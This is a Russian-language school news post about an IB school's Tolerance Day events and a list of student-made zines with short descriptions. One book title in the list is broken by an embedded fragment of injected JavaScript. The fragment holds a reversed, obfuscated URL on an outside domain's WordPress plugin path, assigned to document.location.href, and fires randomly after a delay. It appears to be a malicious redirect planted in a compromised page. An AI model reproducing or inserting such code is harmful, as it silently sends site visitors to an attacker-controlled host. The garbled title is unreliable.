На прошлой неделе жители многих стран отметили Международный день толерантности. Терпимость — одно из самых ценных качеств, именно оно делает нас людьми. «Интеграция XXI век» не могла оставить без внимания этот праздник, являясь международной школой IB, школьное сообщество которой состоит из представителей разных национальностей и религий. Ученики 5-го класса дали свое определение толерантности, ученики 6-класса нарисовали тематические плакаты, а седьмые классы посвятили дню терпимости созданные ими книги. В течение первого триместра учащиеся 7 MYP изучали закономерности композиции. Студенты применили свои знания на практике и создали собственное небольшое произведение искусства – арт-книгу или, как говорят иностранцы, “zine” (от английского слова “magazine”). «Зин» — это небольшая вручную сделанная книга на любую тему, которая волнует автора. В ней простыми визуальными средствами рассказана история. О каждой истории мы узнали на защите проектов, которая состоялась 18 ноября на уроке изобразительного искусства.
Позицию быть толерантными друг к другу ученики и учителя «Интеграции XXI век» выразили специальными символами, которые были прикреплены к форме/медицинским маскам 20-го ноября, в заключительный день этой недели.
Авторы книг:
Амелина Валерия, «Психические расстройства». Книга-справочник с описанием и иллюстрациями основных расстройств личности. Об этом надо знать!
Баркова Ева, «Бах». Книга – посвящение произведению «Партита ля-минор» Баха. Собраны редкие гравюры, партитура, даны определение терминов. Все собрано в стилистически цельное произведение.
Бессчетнова Юлия и Чучупало Анна, «Life of a potatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to». Книга о жизни казалось бы незначительного существа. А на самом деле – взгляд на значение отдельно взятой личности.
Ванурина Елизавета, «Голова». История о скучной жизни и буднях, в которые вторгается нечто. И мир уже не такой серый и скучный, но что делать дальше?
Кузьминова Маюри, «История принцессы Кагуя». Иллюстрации на тему традиционной японской сказки о девочке, которую забрали на Луну.
Полевая Анастасия, «Жизнь одуванчика». История о жизни маленького растения от семечки до распада на маленькие воздушные парашютики. Которые разнесутся по миру и превратятся в деток. Жизнь продолжается.
Поляничко Кира, «Книга о чихуахуа». Мы утыкаемся в экраны смартфонов каждую минуту, даже ночью. Снимаем сториз об утопающих. Хотим соответствовать стандартам красоты. Мы умнее чихуахуа или нет?
Савостьянова Александра, «Ходячий замок. Герои» Путеводитель по знаменитому мультику Миядзаки. Здесь нашлось место второстепенным героям и аутентичным надписям на японском.